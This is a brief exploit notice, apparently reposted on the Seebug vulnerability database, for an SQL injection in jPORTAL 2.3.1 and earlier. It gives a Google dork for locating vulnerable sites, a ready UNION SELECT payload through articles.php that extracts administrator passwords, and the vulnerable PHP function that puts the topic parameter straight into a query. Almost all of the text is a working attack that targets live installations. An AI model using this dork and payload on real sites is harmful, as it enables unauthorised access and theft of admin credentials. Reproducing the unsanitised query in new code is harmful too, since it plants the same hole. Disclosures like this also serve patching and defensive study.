Title:jPORTAL =< 2.3.1 and Remote SQL Injection Vulnerability Dork: intext:"jPORTAL 2" & inurl:"articles.php?topic=" Autor: Alexsize E-Mail: Alexsize@mail.ru Site: Antichat.ru articles.php?topic=-3+union+select+1,pass,3,4,5+from+admins/ Vuln code: function topic_name($a) { global $topic_tbl; $query = "SELECT * FROM $topic_tbl WHERE id=$a"; $result = mysql_query($query); $r = mysql_fetch_array($result); return '<a href="articles.php?topic='.$a.'" class="t_main">'.$r['title'].'</a>'; } C уважением, Alexsize.
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论